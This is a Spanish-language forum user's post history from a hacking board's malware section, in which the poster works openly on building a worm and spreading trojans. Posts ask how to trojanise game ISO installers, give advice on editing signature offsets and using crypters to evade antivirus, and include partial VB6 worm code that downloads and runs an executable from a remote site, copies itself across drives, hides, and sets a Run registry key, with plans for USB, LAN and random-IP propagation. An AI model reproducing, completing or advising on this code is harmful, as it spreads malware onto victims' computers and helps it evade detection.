| |
 Mostrar Mensajes
|
|
Páginas: [1]
|
|
1
|
Seguridad Informática / Hacking / Re: Alguien me puede explicar bien esto por favor??
|
en: 7 Febrero 2014, 02:55 am
|
|
ahhhhhhhhhhhhh, muchas gracias! Ahora si lo entendi bien! xD muchas gracias! Claro primero se ejecuta el instalador e instala normal, y despues cuando instala el infectado no importa que no se instale correctamente,por que primero instalara lo que yo quiero y el usuario cerrar la segunda instalacion ( que aunque la aceptara saldria error,pero ya no importara por que ya habra instalado lo que él queria!)
GRACIAS =D
|
|
|
|
|
2
|
Seguridad Informática / Análisis y Diseño de Malware / Como infectar un ISO hoy en día? es posible??
|
en: 4 Febrero 2014, 14:04 pm
|
|
Hola foreros, bueno estaba renegando con u metodo para infectar un ISO a tra vez del uso de powerISO para poder manipular su contenido pero si junto un troyano con el archivo setup.exe que esta en su interior no se instala el juego (aclaro que lo junto con iexpress), intente jugar un poco con el autorun.inf para decirle que primero ejecute el troyano y despues el setup.exe pero tampoco funciono, me preguntaba si hay algun metodo actual para infectar una ISO o cual es la mejor manera de hacer esto? Saludos y gracias de antemano!
|
|
|
|
|
4
|
Seguridad Informática / Análisis y Diseño de Malware / Re: como puedo hacer funcionar mi troyano una vez que le borre la firma?
|
en: 1 Febrero 2014, 02:00 am
|
|
Hola! Bueno Yo no soy un experto y tampoco te explicas mucho, pero voy a suponer que tenes un troyano al cual atravez de algun metodo (XOR, RIT, Dsplit, AvFucker, etc) identificaste el offset con la firma detectada y lo modificaste y ya no te lo detecta pero ahora no te funciona...si esto es asi entonces lamento decrite, que tambien supongo, que ese offset que hizo indetectable tu troyano en realidad lo hizo obsoleto tambien ( puede que lo ayas roto y por eso no es detectado como amenza por el av, por que en realidad no hay tal amenaza ó tal vez es una firma que esta ddemaciado quemada, y es lo unico que podias cambiar para que no lo detecte pero no se puede hacer sin romper el programa...) Por ende mi consejo es que sigas experimentando, esta claro que el troyano no cumple sus funciones pero ahora tendrias que averiguar bien a que se debe, si no es algo muy quemado, como un modulo de propagacion USB, entonces segui buscando otros offsets que puedas modificar pero que te den el resultado que buscas, que obviamente es que sea indetectable y siga funcionando, te recomiendo que uses un crypter, si tenes tiempo que hagas el tuyo propio, hay muchos tutoriales que muestran como hacerlos paso a paso, mi humilde consejo final es, empeza simple y despues anda agregando la complejidad, asi va hacer mas facil detectar los problemas! Exitos y suerte!
|
|
|
|
|
5
|
Seguridad Informática / Análisis y Diseño de Malware / Re: metodos de propagacion actuales 2014 (pedido)
|
en: 18 Enero 2014, 15:05 pm
|
Hola gracias por responder, aunque soy relativamente nuevo en esto yo no se si de verdad depende todo de exploits hoy en dia, a menos que estes en un proyecto del calibre de stuxnet  De echo es justamente eso lo que me llamo la atencion del Houdini! Que siendo un rat escrito en vbs con metodos de propagacion tan basicos llegara tan lejos, aunque gracias MadAntrax por aclararme que en vbs es mas dificil que los antivirus lo detectaran y fuddearlo! Yo pensaba que era todo lo contrario y que siempre era mejor un .exe bien modeado y conun manifiesto! Ahora mismo estoy haciendo las segundas pruebas con mi primer w0rm al que le di la funcion de propagarce como el houdini ( mas basica aun, tya que yo no se tomar todos esos archivos que estan en el USB y hacer los accesos directos, pero si pude hacer con exito que mi proyecto se copie en mi USB con un autorun y me infecte! Ahora mismo estoy haciendo las segundas pruebas, ya que por el entusiasmo de que funcionara se me olvido poner esta ultima funcion en un loop xD Asi que si justo no estaban los USB's metidos cuando hice la primer prueba dudo mucho que se aya copiado! Deseenme suerte xD Ya en la semana voy a ver como adapatar tu modulo MadAntrax para agregarle la propagacion por LAN! En mi ignorancia yo creo que con estos dos metodos ya tendria un gusano más que decente, ya que mi objetivo es equilibrar la propagacion con la propiedad de que pase desapercivido lo más posible...jeje Una vez agregue esa ya me meto de lleno en un script que haga lo mismo y sea polymorphico! Ya que decis que no es tan complicado hacerlo en este lenguage y sera menos detectado! Gracias MadAntrax!!!  |
|
|
|
|
6
|
Seguridad Informática / Análisis y Diseño de Malware / Re: metodos de propagacion actuales 2014 (pedido)
|
en: 17 Enero 2014, 08:46 am
|
Los métodos que más me gustan son:
LAN Honeypot
LAN Spread
USB Spread
Con esas opciones ya tendrás un worm de alta propagación
Gracias ||MadAntrax|| voy a ver como implementar estos tres ahora mismo estoy en ello! Estoy viendo como usar el metodo USB como el del tan popular Houdini worm , que esconde todos los archivos y hace accesos directos infectados en su lugar! Por que el que uso de momento lo copia con un autorun pero no me termina de convencer... Y para la parte de Lan estoy viendo un codigo que pusiste vos que enumera los equipos en red y trata de infectarlos, les copia el regedit.exe! Estoy viendo como ponerlo en un modulo para que haga lo mismo pero se copie asi mismo, la idea es ponerlo en un modulo y que se copie a si mismo ahi.....=P Aprobecho la oportunidad para decirte que no sos solo una fuente de buenos modulos xD pero tambien toda una fuente de inspiracion para mi! Admiro tu trabajo y cada dos por tres que encuentro algo interesante viene de vos! Asi que gracias por responder y voy a tener en cuenta estos metodos más ahora que vienen tan bien recomendados!!! Espero con ansias que termines tu proyecto que seguro es una obra de arte! =D Saludos y exitos! |
|
|
|
|
7
|
Seguridad Informática / Análisis y Diseño de Malware / metodos de propagacion actuales 2014 (pedido)
|
en: 15 Enero 2014, 21:02 pm
|
|
Hola grandes hackers! Hace algunos meses empeze a estudiar por mi cuenta en mi tiempo libre ( que para bien o para mal ultimamente..es bastante xD ) todo lo que es este mundo de programacion y al poco tiempo me llamo mucho la atencion mas en concreto el mundo del maleware! Y es que me parece de los mas interesante como funcionan los gusanos y troyanos, sobretodo los de esta ultima generacion, y todo empezo sino me equivoco hace unos 25 años con el gusano de Morris, el cual despues de leer y analizar no me parecio tan complejo por eso me anime a seguir investigando pero la verdad los de ultima generacion si que parecen bastante mas complejos.
Bueno hace unos meses entonces empeze a programar aplicaciones sencillas, como un crypter que despues de retocar me quedo funcional y bastante indetectable. Pero ahora entrando al mundo de los gusanos ya se me complico un poco, hace unas cuantas semanas empeze a programar mi primer worm y como ya habia echo el crypter en VB6 bueno decidi probar hacer mi worm con este mismo lenguage.
Hace poco lei en este mismo foro ( lleno de grandes aportes!) la autopsia de un gusano bastante poderoso, entre otros nombres conocido como houdini-worm que parece que esta infectando a lo loco y ser muy complejo, sin embargo aca en menos de 24 horas lo destriparon todo xD y es aca donde entra mi duda...
Como se llega a ese nivel? Como hacen esas maravillas (aunque un poco destructivas o molestas como este houdini) que son tan capacez, que el creador libera y el software solo se busca la vida y llega tan lejos como para que ahora estemos hablando de el por ejemplo.
Me gustaria saber como incorporar ese tipo de funciones a mi worm basico que solo se copia en algunas carpetas y descarga mi server y poco mas, ya que los tiempos de morris o iloveyou quedaron atras y la propagacion por msn,mail,lan,p2p ya no es efectiva ( lo que me molesta es que esto si ya lo puedo hacer y no me parece tan dificil xD ) Pero ahora estoy en windows 7 y mi worm no puede evolucionar....no les pongo el codigo por que es como dije antes de lo mas basico que hay.
Mi pregunta entonces es : que funciones le puedo agregar a mi worm ( o que deberia leer y estudiar para saber la respuesta) para poder propagarme de forma eficiente, como el houdini por ejemplo ( se que esconde los archivos del usb de manera que windows no te los muestra y en su lugar genera accesos directos para infectar, bueno esto lo tengo claro y ya lo estoy estudiando a full..) pero bueno necesitaria una manito para avanzar mas rapido, necesito propagarme de forma mas masiva ( no hablo de millones tampoco xD ) pero algo que me de el control de la situacion, que modulos puedo implementar o como hacer....el objetivo principal es estar orgulloso de mi creacion por supuesto! Tambien cuento con Backtrack 5 r 3 que fue como empezo todo esto para mi xD Ya se que Vb6 no es el mejor lenguage pero tambien estoy seguro que igual se pueden hacer cosas muy interesantes con el todavía (por que mucho de lo que veo esta echo con VBS y es muy efectivo!)
Bueno ya escribi mucho xD Cualquier ayuda o debate me ayudaria, si alguien esta como yo y quiere aprender tambien no estaria mal formar un grupo para cubrir mas terreno, las ganas de aprender no me faltan y le dedico mucho tiempo pero eso no va a ser para siempre asi que por eso me urge lo de propagarme xD
Mi principal problema es que soy el unico de mi entorno que se interesa en este tema y no tengo a nadie que me ayude o siquiera que quiera desarrollar nada de nada, entonces todo lo tengo que hacer solo, buscar , ver tutoriales, leer articulos y manuales....
Desde ya gracias y felicidades por los aportes y por hacer de este uno de los foros de malweare mas inrteresantes con los que me tope! De nuevo cualquier ayuda orientacion o consejo va a ser mas que bien recivido! Me disculpo si lastime sus ojos con alguna falta de ortografia, suelo escribir mas en ingles y por eso hace años configure la correccion en ese idioma xD
Sin mas me despido y espero tener algunas respuestas!!!! =D
|
|
|
|
|
8
|
Seguridad Informática / Análisis y Diseño de Malware / Re: [AYUDA]Encriptador de Archivos en VBS
|
en: 30 Diciembre 2013, 06:22 am
|
hola danny! yo soy nuevo asi que solo te queria preguntar para ver si entendi bien: Esto seria un crypter de archivos vbs? Por que no compilarlo y hacerlo exe y encryptarlo "normalmente"? Para que quede claro mi duda es: decis que seria mejor/mas eficiente por que no esta tan visto/usado? seria un interesante concepto pd: vi en otro tema tuyo que necesitas payloads, bueno seguramente ya lo conoces, pero por las dudas te comento en backtrack 5 tenes las libreria de payloads y exploit que usa metaesploit, y tambien pordes descargar mas actualizando o mas selectivamente desde www.exploit-db.com.Bueno si veo algo que te sirva por ahi te lo posteo aca! suerte y exitos! |
|
|
|
|
9
|
Seguridad Informática / Análisis y Diseño de Malware / Ayuda con proyecto w0rm [VB6]!!!! (incluye modulo de descarga remota ;) )
|
en: 28 Diciembre 2013, 20:34 pm
|
Hola foro! primero que nada me gustaria desearles feliz año! Ya empezo el 2014 y me agarro trabajando en un proyecto pero la verdad es que me necesisto unos consejos! Tengo mi w0rm a la mitad pobresito xD Bueno les explico el proyecto: #Nombre: Proyecto W0rm 2013. #Lenguaje: Visual Basic 6. #SO: Windows 7 Español-Ingles. #Funciones: 1-Auto-Copy en todas las unidades disponibles y en algunos de los directorios de windows. 2-Crear llave de Registro para garantizar que se inicie con la PC. 3-Descargar y ejecutar. 4-Propagarce por Usb, Lan y Generar IP. 5-Comprobar estado de w0rm y archivos extra. #codigo
Private Sub Form_Load()
On Error Resume Next 'le digo que si hay algun error siga adelante.
URLDownloadToFileA 0, "https://myremotesite.com/Archivo.exe",
"C:\Archivo.exe", 0, 0 'esto es parte del codigo para descargar y ejecutar, le digo de donde conseguir el archivo y donde guardarlo.
'#####1-Auto-Copy#####
RutaFinal1 = "C:\testworm.exe" 'le digo donde copiarce
RutaFinal2 = "C:\Windows\testworm.exe"
RutaFinal3 = "D:\testworm.exe"
RutaFinal4 = "F:\testworm.exe"
ArchivoOrigen = App.Path & "\" & App.EXEName & ".exe" 'le digo donde estsa guardado para que pueda copiarce.
FileCopy ArchivoOrigen, RutaFinal1
FileCopy ArchivoOrigen, RutaFinal2
FileCopy ArchivoOrigen, RutaFinal3 'le digo que se copie.
FileCopy ArchivoOrigen, RutaFinal4
FileCopy ArchivoOrigen, RutaFinal5
Me.Visible = False 'le digo que lo haga oculto
End Sub
' #####2-Crear llave de Registro#####
'en esta parte estoy trabajando ahora.....
Private Sub Resident()
Dim REG As Object
gusano = "C:\Windows\en\testworm.exe"
Set REG = CreateObject("WScript.Shell")
REG.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Test", gusano
'esto no me funciona y llevo un rato probando distintos codigos..pero nada en mi registro......que es lo que esta mal????????
End Sub
'######3-Descargar y ejecutar.######
'segunda parte del codigo de descarga y ejecucion, esta se encarga de ejecutar el Archivo.
Private Sub Timer8_Timer() 'pongo un Timer con intervalo de dos segundos
On Error Resume Next en el form.
If Dir("C:\Archivo.exe") = "" Then
Timer8.Enabled = True
Else
Shell "C:\Archivo.exe", vbNormalFocus
Timer8.Enabled = False 'Esta parte apaga el timer,para
End If el Archivo.exe no se siga ejecutando!
'#####4-Propagarce por Usb, Lan y Generar iP.#####
'trabajando en esto.....
'MadAntrax publico un modulo de clase para esto pero era para Xp....como puedo hacer que funcione en win7? tengo entendido que el modulo asi que el gusano creara IPs para infectar la mayor cantidad de equipos posible!!! Necesito algo asi!
#####5-Comprobar estado######
'trabajando en esto ...
'esto me las puedo arreglar tranquilo despues no me urge xD con unos timers o los comandos minute(now) u hour(now) se que le voy a dar forma...me urgen mas las dos funciones anteriores!
End Sub
Modulo para completar la funcion de Descarga y Ejecucion.
Declare Sub URLDownloadToFileA Lib "URLMON" (ByVal e As Long, ByVal w As String, ByVal f As String, ByVal g As Long, ByVal n As Long)
Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Bueno la verdad gracias al foro y a mucha busqueda por google, avanze un poco pero lo que mas necesito ahora seria completar las funciones que tengo incompletas. MadAntrax posteo un modulo para propagarce por LAN e IP pero era para XP , como puedo hacer esto para win7 ??? a propagarce por IP me refiero a que cree dinamicamente IPs para infectar la mayor cantidad de equipos posible! Bueno cualquier ayuda les estare infinitamente agradecido! Desde ya gracias por leer y espero que les sirva el Modulo y el poco codigo que aporto! |
|
|
|
|
|
| |
|
